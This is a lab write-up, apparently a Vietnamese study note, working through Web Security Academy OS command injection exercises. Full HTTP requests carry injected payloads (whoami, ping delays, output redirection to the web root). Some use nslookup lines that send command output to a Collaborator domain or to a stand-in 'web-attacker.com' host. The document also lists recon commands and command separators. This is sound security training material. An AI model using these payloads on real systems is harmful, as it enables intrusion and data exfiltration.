Injecting OS Commands
Việc sử dụng & ở cuối command cần inject giúp bỏ qua các đối số phía sau nhằm đảm bảo command được thực thi:
Placing the additional command separator `&` after the injected command is useful because it separates the injected command from whatever follows the injection point. This reduces the chance that what follows will prevent the injected command from executing.Lab: OS Command Injection, Simple Case
Sử dụng request sau:
POST /product/stock HTTP/2
Host: 0a93001904f923008052c19100e200c5.web-security-academy.net
Cookie: session=cczYLP1DDaef5BTdY0u7FbNIyrTI8wVp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Referer: https://0a93001904f923008052c19100e200c5.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: https://0a93001904f923008052c19100e200c5.web-security-academy.net
productId=1&storeId=%26%20%77%68%6f%61%6d%69Với injection point là storeId và payload là & whoami.
Response:
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 13
peter-rlYkVAUseful Commands
Các câu lệnh dùng để thu thập thông tin của hệ thống sau khi xác định được lỗ hổng:
After you identify an OS command injection vulnerability, it's useful to execute some initial commands to obtain information about the system. Below is a summary of some commands that are useful on Linux and Windows platforms:
| Purpose of command | Linux | Windows |
| --------------------- | ------------- | --------------- |
| Name of current user | `whoami` | `whoami` |
| Operating system | `uname -a` | `ver` |
| Network configuration | `ifconfig` | `ipconfig /all` |
| Network connections | `netstat -an` | `netstat -an` |
| Running processes | `ps -ef` | `tasklist` |Blind OS Command Injection Vulnerabilities
Detecting Blind OS Command Injection Using Time Delays
Tạo ra delay để phát hiện OS command injection:
You can use an injected command to trigger a time delay, enabling you to confirm that the command was executed based on the time that the application takes to respond. The `ping` command is a good way to do this, because lets you specify the number of ICMP packets to send. This enables you to control the time taken for the command to run:
`& ping -c 10 127.0.0.1 &`
This command causes the application to ping its loopback network adapter for 10 seconds.Lab: Blind OS Command Injection with Time Delays
Sử dụng request sau:
POST /feedback/submit HTTP/2
Host: 0a4000b7038719a88228d3f5000200a6.web-security-academy.net
Cookie: session=7b0kI9kakKj85aHJZWvipy3Hlk6L6f4u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://0a4000b7038719a88228d3f5000200a6.web-security-academy.net
Referer: https://0a4000b7038719a88228d3f5000200a6.web-security-academy.net/feedback
csrf=I7cTeLPFL0G4outrL4lCl3L6iQjw9YnD&name=a&email=%26%20%70%69%6e%67%20%2d%63%20%31%30%20%31%32%37%2e%30%2e%30%2e%31%20%26&subject=a&message=aVới email có giá trị là:
& ping -c 10 127.0.0.1 &Response phản hồi sau khoảng 9.3 - 9.4 giây. Điều này cho thấy ta đã thực hiện việc delay thành công.
Exploiting Blind OS Command Injection by Redirecting Output
Cách khai thác bằng cách sử dụng output redirect:
You can redirect the output from the injected command into a file within the web root that you can then retrieve using the browser. For example, if the application serves static resources from the filesystem location `/var/www/static`, then you can submit the following input:
`& whoami > /var/www/static/whoami.txt &`Lab: Blind OS Command Injection with Output Redirection
Sử dụng request sau:
POST /feedback/submit HTTP/2
Host: 0a64009404b67095846dfe4f00fd0003.web-security-academy.net
Cookie: session=Y8R1zqAP9BCX0kd88oMwlX8Uu8SviNIi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://0a64009404b67095846dfe4f00fd0003.web-security-academy.net
Referer: https://0a64009404b67095846dfe4f00fd0003.web-security-academy.net/feedback
csrf=hivBjYuPeZDnYfCbNnkUgzjhWwxc2uAB&name=%20%26%20whoami%20%3e%20%2fvar%2fwww%2fimages%2fwhoami.txt%20%26&email=a%40a.com&subject=a&message=aVới injection point là name và payload là & whoami > /var/www/images/whoami.txt &.
Sau đó, gửi GET request đến /image?filename=whoami.txt để truy xuất tên user. Response của request này:
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 13
peter-fQugh3Exploiting Blind OS Command Injection Using Out-of-band (OAST) Techniques
Sử dụng out-of-band interaction để phát hiện OS command injection:
You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques. For example:
`& nslookup kgji2ohoyw.web-attacker.com &`Cách trích xuất dữ liệu bằng cách sử dụng out-of-band interaction:
The out-of-band channel provides an easy way to exfiltrate the output from injected commands:
``& nslookup `whoami`.kgji2ohoyw.web-attacker.com &``
This causes a DNS lookup to the attacker's domain containing the result of the `whoami` command:
`wwwuser.kgji2ohoyw.web-attacker.com`Lab: Blind OS Command Injection with Out-of-band Interaction
Sử dụng request sau:
POST /feedback/submit HTTP/2
Host: 0aef009303f0317f809ae9550049004c.web-security-academy.net
Cookie: session=RQ5kEivfXS305Vx0ZJDMtMoLuuuNhAWa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 308
Origin: https://0aef009303f0317f809ae9550049004c.web-security-academy.net
Referer: https://0aef009303f0317f809ae9550049004c.web-security-academy.net/feedback
csrf=BgCNBUUOOxMuqmR1x4wXc1EoqVZoVSWo&name=a&email=%26%20nslookup%20mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com%20%26&subject=a&message=aVới injection point là email và payload là & nslookup mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com &. Giá trị mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com là domain của Burp Suite Collaborator.
Sau khi gửi request, nhận được 2 DNS query:
The Collaborator server received a DNS lookup of type A for the domain name **mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com**.
The lookup was received from IP address 3.251.120.108:58034 at 2025-Apr-20 01:33:51.319 UTC.
The Collaborator server received a DNS lookup of type A for the domain name **mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com**.
The lookup was received from IP address 3.251.120.100:18601 at 2025-Apr-20 01:33:51.319 UTC.Blind OS Command Injection with Out-of-band Data Exfiltration
Sử dụng request sau:
POST /feedback/submit HTTP/2
Host: 0ac9007c0433aaaa80191c5b006d0018.web-security-academy.net
Cookie: session=d70u1cylUEnzOjb9EakPY9Y4pUmTXk8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Origin: https://0ac9007c0433aaaa80191c5b006d0018.web-security-academy.net
Referer: https://0ac9007c0433aaaa80191c5b006d0018.web-security-academy.net/feedback
csrf=ua5GwOvV2zqP3iov6fMG6f44c3T1Ph2k&name=a&email=%26%20nslookup%20%60whoami%60.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com%20%26&subject=a&message=aVới injection point là email và payload là & nslookup whoami.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com &.
Sau khi gửi request, có 2 DNS query gửi tới server của Burp Collaborator:
The Collaborator server received a DNS lookup of type A for the domain name **peter-niBLE4.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com**.
The lookup was received from IP address 3.248.186.189:29253 at 2025-Apr-20 01:42:30.108 UTC.
The Collaborator server received a DNS lookup of type A for the domain name **peter-niBLE4.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com**.
The lookup was received from IP address 3.248.186.224:17126 at 2025-Apr-20 01:42:30.108 UTC.Submit solution với giá trị là peter-niBLE4 để hoàn thành lab.
Ways of Injecting OS Commands
Các cách để thực hiện OS command injection:
A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:
- `&`
- `&&`
- `|`
- `||`
The following command separators work only on Unix-based systems:
- `;`
- Newline (`0x0a` or `\n`)
On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:
- `` ` `` injected command `` ` ``
- `$(` injected command `)`